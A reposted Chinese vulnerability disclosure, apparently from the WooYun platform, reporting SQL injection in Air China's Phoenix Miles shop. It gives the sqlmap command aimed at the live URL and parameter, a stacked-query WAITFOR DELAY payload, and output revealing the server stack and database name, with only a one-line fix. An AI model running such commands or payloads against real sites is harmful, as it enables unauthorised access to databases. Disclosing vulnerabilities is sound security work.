记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国国际航空凤凰知音商城SQL注入

2015-10-03 16:35

code 区域
sqlmap.py -u "http://eshop.airchina.com.cn//Draw/Draw_listAja

x.aspx?proName=*" --current-db --no-cast --time-sec=10





1.jpg





code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: http://eshop.airchina.com.cn:80//Draw/Draw_listAjax.aspx?proName=';WAITFOR DELAY '0:0:10'--

---

web server operating system: Windows

web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx

back-end DBMS: Microsoft SQL Server 2005

current database: 'airchinav2db'





漏洞证明:

code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: http://eshop.airchina.com.cn:80//Draw/Draw_listAjax.aspx?proName=';WAITFOR DELAY '0:0:10'--

---

web server operating system: Windows

web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx

back-end DBMS: Microsoft SQL Server 2005

current database: 'airchinav2db'

修复方案:

参数过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0143890

阅读:96894 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国国际航空凤凰知音商城SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词